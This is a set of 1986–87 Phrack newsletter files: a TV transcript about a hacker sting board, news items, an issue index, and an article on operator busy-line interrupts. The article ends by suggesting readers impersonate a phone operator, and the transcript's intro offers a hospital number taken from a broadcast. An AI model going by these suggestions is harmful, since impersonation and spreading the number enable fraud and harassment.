- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
A few quicknotes in between shows, Mike Wendland and John Maxfield set up THE
BOARD. Carman Harlan and Mort Crim are newscasters.
Also if anyone is interested in the stupidity of Mike Wendland, he flashed the
post that contained the phone number to the hospital across the screen, Bad
Subscript put the VCR on pause and got the number. If interested please
contact Bad Subscript, Ctrl C, or myself.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Carman Harlan: Tonight on the second part of a news 4 [WDIV-TV, Channel 4 in
Detroit] extra Mike Wendland and the I-Team report on how they
setup a sting bulletin board to see how much they could get on
these criminal hackers. Mike joins us now to explain that
information, that was not the only thing they got.
Mike Wendland: That's right, Carman & Mort. Our so called sting bulletin
board received hundreds of calls from hackers all over America,
and even Canada. They offered to trade stolen credit cards,
and they told how to electronically break into sensitive
government computers. But our investigation came to a sudden
end when our sting board was stung. Our cover was blown when
a hacker discovered that this man, computer security expert
John Maxfield was serving as the I-Team consultant on the
investigation. Maxfield specializes as a hacker tracker and
has worked for the F.B.I. and various other police and security
agencies. The hacker discovered our sting board by getting a
hold of Maxfield's supposedly confidential telephone records.
John Maxfield: And in the process of doing that he discovered the real number
to the computer. We were using a different phone number that
was call forwarded to the true phone number, he found that
number out and called it to discover he was on the sting board.
Mike Wendland: But the hacker didn't stop at exposing the sting, instead he
posted copies of Maxfield's private telephone bill on other
hacker bulletin boards across the country.
John Maxfield: The harassment started, all of the people on my phone bill got
calls from hackers. In some cases their phone records were
also stolen, friends and relatives of theirs got calls from
hackers. There was all sorts of other harassment, I got a call
from a food service in Los Angeles asking where I wanted the
500 pounds of pumpkins delivered. Some of these kids are
running around with guns, several of them made threats that
they were going to come to Detroit, shoot me and shoot Mike
Wendland.
Mike Wendland: A spokesperson from Michigan Bell said that the breakdown in
security that led to the release of Maxfield's confidential
records was unprecedented.
Phil Jones (MI Bell): I think as a company were very concerned because we work
very hard to protect the confidentially of customer's
records. [Yeah, right].
Mike Wendland: The hacker who got a hold of Maxfield's confidential phone
records is far removed from Michigan, he lives in Brooklyn, NY
and goes by the name Little David [Bill From RNOC]. He says
that getting confidential records from Michigan Bell or any
other phone company is child's play. Little David is 17 years
old. He refused to appear on camera, but did admit that he
conned the phone company out of releasing the records by simply
posing as Maxfield. He said that he has also sold pirated
long-distance access codes, and confidential information
obtained by hacking into the consumer credit files of T.R.W.
Little David says that one of his customers is a skip-tracer, a
private investigator from California who specializes in finding
missing people. Maxfield, meanwhile, says that his own
information verified Little David's claim.
John Maxfield: The nearest I can determine the skip-tracer was using the
hacker, the 17 year old boy to find out the whereabouts of
people he was paid to find. He did this by getting into the
credit bureau records for the private eye. This is an invasion
of privacy, but it's my understanding that this boy was getting
paid for his services.
Mike Wendland: In Long Island in New York, Maxfield's telephone records were
also posted on a bulletin board sponsored by Eric Corley,
publisher of a hacker newsletter [2600 Magazine]. Corley
doesn't dispute the harassment that Maxfield received.
Eric Corley: Any group can harass any other group, the difference with hackers
is that they know how to use particular technology to do it. If
you get a malevolent hacker mad at you there's no telling all the
different things that can happen.
Mike Wendland: What can happen? Well besides getting your credit card number
or charging things to your account, hackers have been known to
change people's credit ratings. It is really serious business!
And tomorrow night we'll hear about the hacker philosophy which
holds that if there is information out there about you it is
fair game.
Mort Crim: "1984" in 1986.
Mike Wendland: It is!
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Carman Harlan: News four [WDIV-TV, Channel 4 in Detroit] extra, Mike Wendland
and the I-Team look at how these hackers are getting out of
hand.
Mike Wendland: The problem with hackers is not just with mischief anymore,
unscrupulous hackers are not only invading your privacy, they
are costing you money. Case and point, your telephone bills,
because American telephone companies have long been targets of
computer hackers and thieves we are paying more than we should.
Experts say the long distance companies lose tens of millions
of dollars a year to, these self described "Phone Phreaks."
For example in Lansing, the Michigan Association of
Governmental Employees received a phone bill totalling nearly
three hundred and twenty one thousand dollars. For calls
illegally racked up on there credit card by hackers. Such
victims seldom get stuck paying the charges, so hackers claim
there piracy is innocent fun.
Phil Jones (MI Bell): Nothing could be further from the truth, it becomes a
very costly kind of fun. What happens is that the
majority of the customers who do pay there bills on
time, and do use our service lawfully end up quitting
after that bill.
Mike Wendland: That's not all, hackers regularly invade our privacy, they
leave pirated credit card numbers and information how to break
into electronic computer banks on bulletin boards. Thousands
of such electronic message centers exist across the country,
most operated by teenagers.
John Maxfield: There is no law enforcement, no parental guidance, they're just
on their own so they can do anything they want. So the few bad
ones that know how to steal and commit computer crimes teach
the other ones.
Mike Wendland: There is very little that is safe from hackers, from automatic
teller machines and banks to the internal telephone systems at
the White House. Hackers have found ways around them all
hackers even have their own underground publication of sorts
that tells them how to do it.
[Close up of publication]
Its called 2600 [2600 Magazine], after the 2600 hertz that
phone phreaks use to bypass telephone companies billing
equipment. It tells you how to find credit card numbers and
confidential records in trash bins, break into private
mainframe computers, access airline's computers, and find
financial information on other people through the nations
largest credit bureau, TRW. 2600 is published in a
ram-shackled old house at the far end of Long Island, New York
by this man, Eric Corley. He argues that hackers aren't
electronic gangsters.
Eric Corley: We like to call them freedom fighters. Hackers are the true
individuals of the computer revolution, they go were people tell
them not to go, they find out things they weren't supposed to
find out.
Mike Wendland: Corley's newsletter supports a hacker bulletin board called the
Private Sector. Last year the F.B.I. raided it.
Eric Corley: They managed to charge the system operator with illegal
possession of a burglary tool in the form of a computer program.
Mike Wendland: But the bulletin board is still in operation. Corley resents
the suspicion that hackers are involved in criminal activities.
Eric Corley: Hackers are not the people who go around looking for credit cards
and stealing merchandise. That's common thievery. Hackers are
the people who explore. So basically what we are saying is more
knowledge for more people. That will make it better for
everybody.
Mike Wendland: He claims that hackers, in their own ways, really protect our
rights by exposing our vulnerabilities. Well hackers may
expose our vulnerabilities, but they also invade our privacy.
There activities have really spotlighted the whole question of
privacy raised by the massive files that are now out there in
electronic data banks. Much of that information that we think
is personal and confidential is often available to the whole
world.
Original transcript gathered and typed by
Ctrl C & Bad Subscript
Major editing by Knight Lightning
_______________________________________________________________________________

298
phrack10/9.txt Normal file
View file

@ -0,0 +1,298 @@
==Phrack Inc.==
Volume Two, Issue Ten, Phile #9 of 9
PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
PWN PWN
PWN <-=*} Phrack World News {*=-> PWN
PWN PWN
PWN Issue IX/Part Two PWN
PWN PWN
PWN Compiled, Written, and Edited by PWN
PWN PWN
PWN Knight Lightning PWN
PWN PWN
PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
On The Home Front December 25, 1986
-----------------
Happy Holidays to all from everyone at Phrack Inc. and Metal Shop Private!
Well, here we are at that time of year again and before too long we will have a
new wave of self appointed hackers who got their modems for Christmas.
Some important dates to point out:
November 17, 1986............1st Anniversary of Phrack Inc.
January 2, 1987..............1st Anniversary of Metal Shop being a PRIVATE BBS.
January 10, 1987.............1st Anniversary of Metal Shop AE, now Quick Shop
January 25, 1987.............1st Anniversary of Phrack World News
The Phrack Inc./Metal Shop Private Voice Mailbox is now back in operation. If
you have a question for Taran King, Cheap Shades, or myself and cannot reach us
through regular means, please leave us a message on our VMS.
Thanks to the efforts of Oryan Quest, an upcoming Phrack Pro-Phile will focus
on Steve Wozniak.
Plans are already underway for Summer Con '87. It is to be held in St. Louis,
Missouri during the last week of June. It is being sponsored by TeleComputist
Newsletter, Phrack Inc., and Metal Shop Private. Forest Ranger is in charge of
planning and is putting out a lot of front money for the necessary conference
rooms and such. There will be a mandatory $10 admittance at the door to Summer
Con '87. If you will be attending this conference, please as an act of
good faith and to save 50% send $5 in early to:
J. Thomas
TeleComputist Newsletter
P.O. Box 2003
Florissant, Missouri 63032-2003
Also, Letters to the Editor and anything else dealing with TeleComputist can be
sent to the same address. TeleComputist can also be reached through Easylink
at 62195770, MCI Telex at 650-240-6356, CIS at 72767,3207 and PLINK at OLS 631.
Try MCI and Easylink first.
Not much else to say... so keep learning and try not to get into any trouble.
:Knight Lightning
_______________________________________________________________________________
Computer Hackers Beware! - Senate Passes Computer Fraud And Abuse Act
------------------------ ------------------------------------------
On October 2, 1986, the US Senate unanimously passed the Computer Fraud and
Abuse Act of 1986. The bill, S. 2281, imposes fines of up to $500,000 and/or
prison terms of up to 20 years for breaking into government or financial
institutions' computers.
The Federal Government alone operates more than 18,000 medium-scale and
large-scale computers at some 4,500 different sites. The Office of Technology
Assessment estimates the government's investment in computers over the past
four years at roughly $60 million. The General Services Administration
estimates that there will be 250,000 to 500,000 computers in use by the Federal
Government by 1990.
In 1984, legislators' attention to and concern about computer fraud was
heightened by a report by the American Bar Association task force on computer
crime. According to the report, based on a survey of 1,000 private
organizations and public agencies, forty-five percent of the 283 respondents
had been victimized by some form of computer crime, and more than 25 percent
had sustained financial losses totaling between an estimated $145 million and
$730 million during one twelve month period.
To address this problem, the Senate and House enacted, in 1984, the first
computer statute (18 U.S.C. 1030). Early this year both the House and Senate
introduced legislation to expand and amend this statute.
In the current bill, which is expected to be signed by President Reagan next
week, penalties will be imposed on anyone who knowingly or intentionally
accesses a computer without authorization, or exceeds authorized access and:
(1) Obtains from government computers information relating to national defense
and foreign relations.
(2) Obtains information contained in financial records of financial
institutions.
(3) Affects the use of the government's operation of a computer in any
department or agency of the government that is exclusively for the use of
the U.S. Government.
(4) Obtains anything of value, unless the object of the fraud and the thing
obtained consists only of the use of the computer.
(5) Alters, damages, or destroys information in any federal interest computer,
or prevents authorized use of any such computer or information.
Under the bill, a person would be guilty of computer fraud if he or she causes
a loss of $1,000 or more during any one year period.
Depending on the offense, penalties include fines up to $100,000 for a
misdemeanor, $250,000 for a felony, $500,000 if the crime is committed by an
organization, and prison terms of up to 20 years.
The bill also prohibits traffic in passwords and other information from
computers used for interstate or foreign commerce. This part of the bill makes
it possible for Federal Prosecutors to crack down on pirate bulletin boards and
similar operations because the bill covers business computers, online networks,
and online news and information services, all of which are considered
interstate commerce.
Information provided by
P - 8 0 S y s t e m s
_______________________________________________________________________________
GTE News December 20, 1986
--------
"GTE Develops High-Speed GaAs Multiplexer Combining Four Data Channels"
In an effort to achieve data communication rates of several gigabits per
second, GTE Labs (Waltham, MA) is combining the high-capacity of fiber optics
with the high speed of gallium arsenide circuits. The research arm of GTE has
designed a GaAs multiplexer that can combine four data channels, each with a
communication rate of 1 gigabit per second, into one channel. GTE has also
recently developed a technique called MOVPE (metal-organic vapor-phase
epitaxy) for efficiently growing thin-film GaAs crystals.
The new devices should play an important role in future communication systems,
which will involve high-capacity fiber-optic cables connecting houses and
offices through telephone switching centres. Data rates on these cables could
be as high as 20 gigabits per second. In addition to standard computer data,
numerous video channels could be supported, each with a data rate of almost
100 megabits per second. The GaAs multiplexers will probably be the only
devices fast enough to interface houses and offices through this fiber-optic
grid. In future supercomputers [misuse of the word -eds.] these multiplexers
will also be used for high-speed fiber-optic transmissions between various
boards in the computer, replacing copper wires. Because of the high-speed
nature of the fiber-optic link, such techniques may even be used for chip-to-
chip communication.
GTE said it has completed a prototype of the GaAs multiplexer and a final
version should be ready in less than a year.
Comments: And meanwhile, while GTE's been building gigabit/second
multiplexers, AT&T Bell Labs is still experimenting with the neuron
webs from slug brains...
Information from Byte Magazine, December 1986, Page 9
Typed & Commented on by Mark Tabas
_______________________________________________________________________________
The LOD/H Technical Journal
---------------------------
The Legion Of Doom/Hackers Technical Journal is a soft-copy free newsletter
whose primary purpose is to further the knowledge of those who are interested
in topics such as: Telecommunications, Datacommunications, Computer & Physical
Security/Insecurity and the various technical aspects of the phone system.
The articles are totally original unless otherwise stated. All sources of
information for a specific article are listed in the introduction or conclusion
of the article. They will not accept any articles that are unoriginal,
plagiarized, or contain invalid or false information. Articles will be
accepted from anyone who meets those criteria. They are not dependant upon
readers for articles, since members of LOD/H and a select group of others will
be the primary contributors, but anyone can submit articles.
There is no set date for releasing issues, as they have no monetary or legal
obligation to the readers, but they predict that issues will be released
every 2 or 3 months. Thus, expect 4 to 6 issues a year assuming that they
continue to produce them, which they intend to do.
The bulletin boards sponsoring the LOD/H TJs include:
Atlantis
Digital Logic Data Service
Hell Phrozen Over (HPO)
Metal Shop Private
Private Sector
The Shack //
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
The first issue will include these articles;
- Introduction to the LOD/H Technical Journal and Table Of Contents
- Editorial: "Is the law a deterrent to computer crime?" by Lex Luthor
- Local Area Signalling Services (LASS) by The Videosmith
- Identifying and Defeating Physical Security and Intrusion Detection Systems
Part I: The Perimeter by Lex Luthor
- Traffic Service Position System (TSPS) by The Marauder
- Hacking DEC's TOPS-20: Intro by Blue Archer
- Building your own Blue Box (Includes Schematic) by Jester Sluggo
- Intelligence and Interrogation Processes by Master Of Impact
- The Outside Loop Distribution Plant: Part I by Phucked Agent 04
- The Outside Loop Distribution Plant: Part II by Phucked Agent 04
- LOH Telenet Directory: Update #4 (12-9-86) Part I by LOH
- LOH Telenet Directory: Update #4 (12-9-86) Part II by LOH
- Network News & Notes by "Staff"
That's a total of 13 files...
That ends the preview, the newsletter is due to be released by January 1, 1987
so watch for it!
Information Provided by
Lex Luthor & The Legion Of Doom/Hackers Technical Journal Staff
_______________________________________________________________________________
Texas Rumors Run Rampant December 24, 1986
------------------------
Remember all that controversy about Sir Gamelord being Videosmith?
Well here's the story...
It all started on a conference bridge, where a number of people including Evil
Jay, Line Breaker [who, indirectly started all of this], and Blade Runner among
others were having a discussion.
Line Breaker was telling a story of how Videosmith was a fed, how Videosmith
had busted everyone at a phreak con (or something like that), and how he [Line
Breaker] and some other people called Videosmith up, pretending to be feds, and
got him to admit that he did these things.
Blade Runner was terribly pissed at Sir Gamelord (who had recently attempted to
take over P.H.I.R.M., which is Blade Runner's group). As a retaliatory strike
and after hearing this slander upon Videosmith's name, Blade Runner started
telling people that Sir Gamelord was Videosmith. The stories have been getting
more and more exaggerated since then but that is all that really happened.
[They say everything is bigger in Texas...I guess that includes bullshit too!]
Information Provided by Evil Jay
_______________________________________________________________________________
The Cracker Disappears December 27, 1986
----------------------
The rumors and stories are flying around about the disappearance of one
Bill Landreth aka The Cracker.
Bill Landreth is the author of "Out Of The Inner Circle," a book on hackers
that was published a few years back.
According to newspaper articles in the San Francisco area, Bill was at a
friend's home working on some computer program. His friend stepped out for a
while and when he returned, there was a lot of garbage on screen and a suicide
message.
On Ripco BBS, message was posted about Bill Landreth, stating that he had
disappeared, and was once again wanted by the FBI. The message asked that
anyone in contact with Bill would tell him to contact his "friends."
Most of what is going on right now is bogus rumors. There may be a follow up
story in the next PWN.
Information Provided By
The Prophet/Sir Frances Drake/Elric Of Imrryr
_______________________________________________________________________________
U.S. Sprint Screws Up December 24, 1986
---------------------
Taken From the Fort Lauderdale Sun Sentinal
"He got a 1,400 page bill!"
In Montrose, Colorado, Brad Switzer said he thought the box from the U.S.
Sprint Long Distance Company was an early Christmas present until he opened it
and found that it contained a 1,400 page phone bill.
The $34,000 bill was delivered to Switzer's doorstep Monday. He called U.S.
Sprint's Denver office, where company officials assured him he was "Off the
Hook." A spokesman for U.S. Sprint said that Switzer had mistakenly received
U.S. Sprint's own phone bill for long distance calls.
Typed For PWN by The Leftist
_______________________________________________________________________________

32
phrack11/1.txt Normal file
View file

@ -0,0 +1,32 @@
==Phrack Inc.==
Volume Two, Issue Eleven, Phile #1 of 12
Index
~~~~~
2/17/87
Welcome to Issue Eleven of the Phrack Inc. electronic newsletter.
This issue, I was a bit more reliable about getting the issue out (yes, only 3
days late!). This issue did not come together as easily as I would have hoped
due to a number of people being difficult to get a hold of or getting their
files, but I filled their places in with other files, so if you had been told
you would have a file in this issue, get in contact with me so that it will be
featured in Issue Twelve. The following files are featured in this edition of
Phrack Inc.:
#1 Index to Phrack Eleven by Taran King (1.7K)
#2 Phrack Pro-Phile VIII on Wizard of Arpanet by Taran King (6.8K)
#3 PACT: Prefix Access Code Translator by The Executioner (7.6K)
#4 Hacking Voice Mail Systems by Black Knight from 713 (6.0K)
#5 Simple Data Encryption or Digital Electronics 101 by The Leftist (4.1K)
#6 AIS - Automatic Intercept System by Taran King (15.9K)
#7 Hacking Primos I, II, III by Evil Jay (6.7K)
#8 Telephone Signalling Methods by Doom Prophet (7.3K)
#9 Cellular Spoofing By Electronic Serial Numbers donated by Amadeus (15.2K)
#10 Busy Line Verification by Phantom Phreaker (10.0K)
#11 Phrack World News X by Knight Lightning
#12 Phrack World News XI by knight Lightning
Taran King
Sysop of Metal Shop Private

157
phrack11/10.txt Normal file
View file

@ -0,0 +1,157 @@
==Phrack Inc.==
Volume Two, Issue Eleven, Phile #10 of 12
BUSY LINE VERIFICATION
WRITTEN BY PHANTOM PHREAKER
This file describes how a TSPS operator does a BLV (Busy Line
Verification) and an EMER INT (Emergency Interrupt) upon a busy line that a
customer has requested to be 'broken' into. I have written this file to
hopefully clear up all the misconceptions about Busy Line Verification and
Emergency Interrupts.
BLV is 'Busy Line Verification'. That is, discovering if a line is
busy/not busy. BLV is the telco term, but it has been called Verification,
Autoverify, Emergency Interrupt, break into a line, REMOB, and others. BLV is
the result of a TSPS that uses a Stored Program Control System (SPCS) called
the Generic 9 program. Before the rise of TSPS in 1969, cordboard operators
did the verification process. The introduction of BLV via TSPS brought about
more operator security features. The Generic 9 SPCS and hardware was first
installed in Tucson, Daytona, and Columbus, Ohio, in 1979. By now virtually
every TSPS has the Generic 9 program.
A TSPS operator does the actual verification. If caller A was in the 815
Area code, and caller B was in the 314 Area code, A would dial 0 to reach a
TSPS in his area code, 815. Now, A, the customer, would tell the operator he
wished an emergency interrupt on B's number, 314+555+1000. The 815 TSPS op who
answered A's call cannot do the interrupt outside of her own area code, (her
service area), so she would call an Inward Operator for B's area code, 314,
with KP+314+TTC+121+ST, where the TTC is a Terminating Toll Center code that
is needed in some areas. Now a TSPS operator in the 314 area code would be
reached by the 815 TSPS, but a lamp on the particular operators console would
tell her she was being reached with an Inward routing. The 815 operator then
would say something along the lines of she needed an interrupt on
314+555+1000, and her customers name was J. Smith. Now, the 314 Inward (which
is really a TSPS) would dial B's number, in a normal Operator Direct Distance
Dialing (ODDD) fashion. If the line wasn't busy, then the 314 Inward would
report this to the 815 TSPS, who would then report to the customer (caller A)
that 314+555+1000 wasn't busy and he could call as normal. However if the
given number (in this case, 314+555+1000) was busy, then several things would
happen and the process of BLV and EMER INT would begin. The 314 Inward would
seize a Verification trunk (or BLV trunk) to the toll office that served the
local loop of the requested number (555+1000). Now another feature of TSPS
checks the line asked to be verified against a list of lines that can't be
verified, such as radio stations, police, etc. If the line number a customer
gives is on the list then the verification cannot be done, and the operator
tells the customer.
Now the TSPS operator would press her VFY (VeriFY) key on the TSPS
console, and the equipment would outpulse (onto the BLV trunk)
KP+0XX+PRE+SUFF+ST. The KP being Key Pulse, the 0XX being a 'screening code'
that protects against trunk mismatching, the PRE being the Prefix of the
requested number (555), the SUFF being the Suffix of the requested number
(1000), and the ST being STart, which tells the Verification trunk that no
more MF digits follow. The screening code is there to keep a normal Toll
Network (used in regular calls) trunk from accidentally connecting to a
Verification trunk. If this screening code wasn't present, and a trunk
mismatch did occur, someone calling a friend in the same area code might just
happen to be connected to his friends line, and find himself in the middle of
a conversation. But, the Verification trunk is waiting for an 0XX sequence,
and a normal call on a Toll Network trunk does not outpulse an 0XX first.
(Example: You live at 914+555+1000, and wish to call 914+666+0000. The routing
for your call would be KP+666+0000+ST. The BLV trunk cannot accept a 666 in
place of the proper 0XX routing, and thus would give the caller a re-order
tone.) Also, note that the outpulsing sequence onto a BLV trunk can't contain
an Area Code. This is the reason why if a customer requests an interrupt
outside of his own NPA, the TSPS operator must call an Inward for the area
code that can outpulse onto the proper trunk. If a TSPS in 815 tried to do an
interrupt on a trunk in 314, it would not work. This proves that there is a
BLV network for each NPA, and if you somehow gain access to a BLV trunk, you
could only use it for interrupts within the NPA that the trunk was located in.
BLV trunks 'hunt' to find the right trunks to the right Class 5 End Office
that serves the given local loop. The same outpulsing sequence is passed along
BLV trunks until the BLV trunk serving the Toll Office that serves the given
End Office is found.
There is usually one BLV trunk per 10,000 lines (exchange). So, if a Toll
Office served ten End Offices, that Toll Office would have 100,000 local loops
that it served, and have 10 BLV trunks running from TSPS to that Toll Office.
Now, the operator (in using the VFY key) can hear what is going on on the
line, (modem, voice, or a permanent signal, indicating a phone off-hook) and
take appropriate action. She can't hear what's taking place on the line
clearly, however. A speech scrambler circuit within the operator console
generates a scramble on the line while the operator is doing a VFY. The
scramble is there to keep operators from listening in on people, but it is not
enough to keep an op from being able to tell if a conversation, modem signal,
or a dial tone is present upon the line. If the operator hears a permanent
signal, she can only report back to the customer that either the phone is
off-hook, or there is a problem with the line, and she can't do anything about
it. In the case of caller A and B, the 314 Inward would tell the 815 TSPS, and
the 815 TSPS would tell the customer. If there is a conversation on line, the
operator presses a key marked EMER INT (EMERgency INTerrupt) on her console.
This causes the operator to be added into a three way port on the busy line.
The EMER INT key also deactivates the speech scrambling circuit and activates
an alerting tone that can be heard by the called customer. The alerting tone
that is played every 10 seconds tells the customer that an operator is on the
line. Some areas don't have the alerting tone, however. Now, the operator
would say 'Is this XXX-XXXX?' where XXX-XXXX would be the Prefix and Suffix of
the number that the original customer requesting the interrupt gave the
original TSPS. The customer would confirm the operator had the correct line.
Then the Op says 'You have a call waiting from (customers name). Will you
accept?'. This gives the customer the chance to say 'Yes' and let the calling
party be connected to him, while the previous party would be disconnected. If
the customer says 'No', then the operator tells the person who requested the
interrupt that the called customer would not accept. The operator can just
inform the busy party that someone needed to contact him or her, and have the
people hang up, and then notify the requesting customer that the line is free.
Or, the operator can connect the calling party and the interrupted party
without loss of connection.
The charges for this service (in my area at least) run 1.00 for asking the
operator to interrupt a phone call so you can get through. There is an .80
charge if you ask the operator to verify whether the phone you're trying to
reach is busy because of a service problem or because of a conversation. If
the line has no conversation on it, there will be no charge for the
verification.
When the customer who initiated the emergency interrupt gets his telephone
bill, the charges for the interrupt call will look similar to this:
12-1 530P INTERRUPT CL 314 555 1000 OD 1 1.00
The 12-1 is December first of the current year; 530P is the time the call
was made to the operator requesting an interrupt; INTERRUPT CL is what took
place, that is, an interrupt call; 314 555 1000 is the number requested; OD
stands for Operator Dialed; the 1 is the length of the call (in minutes); and
the 1.00 is the charge for the interrupt. The format may be different,
depending upon your area and telephone company.
One thing I forgot to mention about TSPS operators. In places where a
Remote Trunking Arrangement is being used, and even places where they aren't
in use, you may be connected to a TSPS operator in a totally different area
code. In such a case, the TSPS that you reach in a Foreign NPA will call up an
inward operator for your Home NPA, if the line you requested an EMER INT on
was in your HNPA. If the line you requested EMER INT on was in the same NPA of
the TSPS that you had reached, then no inward operator would be needed and the
answering operator could do the entire process.
Verification trunks seem to be only accessible by a TSPS/Inward operator.
However, there have been claims to people doing Emergency Interrupts with blue
boxes. I don't know how to accomplish an EMER INT without the assistance of an
operator, and I don't know if it can be done. If you really wish to
participate in a BLV/EMER INT, call up an Inward Operator and play the part of
a TSPS operator who needs an EMER INT upon a pre-designated busy line. Billing
is handled at the local TSPS so you will not have to supply a billing number
if you decide to do this.
If you find any errors in this file, please try to let me know about it,
and if you find out any other information that I haven't included, feel free
to comment.
-End of file-

385
phrack11/11.txt Normal file
View file

@ -0,0 +1,385 @@
==Phrack Inc.==
Volume Two, Issue Eleven, Phile #11 of 12
PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
PWN PWN
PWN *>=-{ Phrack World News }-=<* PWN
PWN PWN
PWN Issue X PWN
PWN PWN
PWN Written, Compiled, and Edited PWN
PWN by Knight Lightning PWN
PWN PWN
PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
Scan Man Revisited January 19, 1987
------------------
The following is a reprint from TeleComputist Newsletter Issue Two;
SCAN MAN - FED OR PHREAK? (The Other Side)
TeleComputist is printing the statement Scan Man has made to us
[TeleComputist] in rebuttal to Phrack World News, whom previously printed an
article concerning Scan Man in Phrack Issue VIII. Those of you who have seen
or read the article in Phrack VIII know that it basically covered information
and an intercepted memo alleging Scan Man of going after hackers and turning
in codes off his BBS (P-80 Systems, Charleston, West Virginia 304/744-2253) as
a TMC employee. Please note that this statement should be read with the
article concerning Scan Man in Phrack Issue VIII to get the full
understanding.
Scan Man started off his statement claiming not to work for TMC, but
instead for a New York branch office of Telecom Management (a Miami based
firm). He was flown in from Charleston, West Virginia to New York every week
for a four to five day duration. Once in New York, Telecom Management made
available a leased executive apartment where Scan Man stayed as he worked.
His position in Telecom Management was that of a systems analyst, "...and that
was it!" Scan Man stated. Scan Man also stated that he had never made it a
secret that he was working in New York and had even left messages on his BBS
saying this.
He also went on to say that he had no part in the arrest of Shawn [of
Phreaker's Quest] (previously known as Captain Caveman) by TMC in Las Vegas.
Scan Man claimed to have no ties with TMC in Las Vegas and that they would not
even know him. Scan Man then went on to say that Shawn had never replied to
previous messages Scan man had left asking for TMC codes. Scan Man also said
that the messages about TMC were in no way related to him. He claimed to have
no ties to TMC, which is a franchised operation which makes even TMC unrelated
except by name.
Scan Man stated that he called Pauline Frazier and asked her about the
inquiry by Sally Ride [:::Space Cadet] who acted as an insider to obtain the
information in Phrack VIII. He said that Pauline said nothing to the imposter
(Sally Ride) and merely directed him to a TMC employee named Kevin Griffo.
Scan Man then went on to say that the same day Sally Ride called Pauline
Frazier was the same day he received his notice. And to that Scan Man made
the comment, "If I find out this is so heads will roll!"
After that comment, Scan Man came up with arguments of his own, starting
off with the dates printed in Phrack VIII. He claimed that the dates were off
and backed this up by saying Ben Graves had been fired six months previously
to the conversation with Sally Ride. Scan Man then went on to ask why it had
taken Sally Ride so long to come forward with his information. Scan Man made
one last comment, "It's a fucking shame that there is a social structure in
the phreak world!" Meaning Sally Ride merely presented his information to
give himself a boost socially in the phreak world.
This is how it ended. We would like to say that TeleComputist printed the
statement by Scan Man to offer both sides of the story. We make no judgements
here and take no sides.
Reprinted with permission from TeleComputist Newsletter Issue 2
Copyright (C) 1986 by J. Thomas. All Rights Reserved
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Ok, that was Scan Man's side to the story, now that he had a few months to
come up with one. Lets do a critical breakdown;
-*- "He was flown in from Charleston, West Virginia to New York every week for
a four to five day duration."
Gee, wouldn't that get awfully expensive? Every week...and "made
available a leased executive apartment..." He must have been quite an
asset to "Telecom Management" for them to spend such large amounts on him.
Kinda interesting that he lived in Charleston, West Virginia (where
surprisingly enough there is a branch of TMC) and flew to New York every
week.
-*- "Scan Man claimed to have no ties with TMC in Las Vegas..." Ok, I'll buy
that. Notice how he didn't say that he had no ties with TMC in
Charleston. Furthermore if he had no ties with TMC in Charleston why
would they have his name in their company records? Why would all those
employees know him or dislike him for that matter?
-*- "Scan Man then went on to say that the same day Sally Ride called Pauline
Frazier was the day he received his notice." Well now, how can there be a
connection between the two events at all when Scan Man works for Telecom
Management and has "no ties with TMC" and claimed "not to work for TMC"?
If TMC and Telecom Management are truly independent of each other then
nothing Sally Ride said to Pauline Frazier could have affected him in ANY
way. That is unless he did work for TMC in the first place.
-*- "...and back this up by saying that Ben Graves had been fired six months
previously to the conversation with Sally Ride." Well first of all, PWN
did not give a date as to when Ben Graves was fired from TMC. Second of
all and more important, how does Scan Man know so much about TMC when he
works for "Telecom Management" and has "...no ties with TMC..."?
The rest of his statements were highly debatable and he showed no proof as to
their validity. As for why Sally Ride waited so long to come forward, well he
didn't wait that long at all, he came forward to myself in late May/early June
of 1986. My decision was to do nothing because there wasn't enough proof.
After three months of research we had enough proof and the article was
released.
With this attempt to cover up the truth, Scan Man has only given more
ammunition to the idea that he isn't what he claims to be.
Special Thanks to TeleComputist Newsletter
______________________________________________________________________________
The Cracker Cracks Up? December 21, 1986
----------------------
"Computer 'Cracker' Is Missing -- Is He Dead Or Is He Alive"
By Tom Gorman of The Los Angeles Times
ESCONDIDO, Calif. -- Early one morning in late September, computer hacker Bill
Landreth pushed himself away from his IBM-PC computer -- its screen glowing
with an uncompleted sentence -- and walked out the front door of a friend's
home here.
He has not been seen or heard from since.
The authorities want him because he is the "Cracker", convicted in 1984 of
breaking into some of the most secure computer systems in the United States,
including GTE Telemail's electronic mail network, where he peeped at NASA
Department of Defense computer correspondence.
He was placed on three years' probation. Now his probation officer is
wondering where he is.
His literary agent wants him because he is Bill Landreth the author, who
already has cashed in on the successful publication of one book on computer
hacking and who is overdue with the manuscript of a second computer book.
The Institute of Internal Auditors wants him because he is Bill Landreth the
public speaker who was going to tell the group in a few months how to make
their computer systems safer from people like him.
Susan and Gulliver Fourmyle want him because he is the eldest of their eight
children. They have not seen him since May 1985, when they moved away from
Poway in northern San Diego county, first to Alaska then to Maui where they
now live.
His friends want him because he is crazy Bill Landreth, IQ 163, who has pulled
stunts like this before and "disappeared" into the night air -- but never for
more than a couple of weeks and surely not for 3 months. They are worried.
Some people think Landreth, 21, has committed suicide. There is clear
evidence that he considered it -- most notably in a rambling eight-page
discourse that Landreth wrote during the summer.
The letter, typed into his computer, then printed out and left in his room for
someone to discover, touched on the evolution of mankind, prospects for man's
immortality and the defeat of the aging process, nuclear war, communism versus
capitalism, society's greed, the purpose of life, computers becoming more
creative than man and finally -- suicide.
The last page reads:
"As I am writing this as of the moment, I am obviously not dead. I do,
however, plan on being dead before any other humans read this. The idea is
that I will commit suicide sometime around my 22nd birthday..."
The note explained:
"I was bored in school, bored traveling around the country, bored getting
raided by the FBI, bored in prison, bored writing books, bored being bored. I
will probably be bored dead, but this is my risk to take."
But then the note said:
"Since writing the above, my plans have changed slightly.... But the point is,
that I am going to take the money I have left in the bank (my liquid assets)
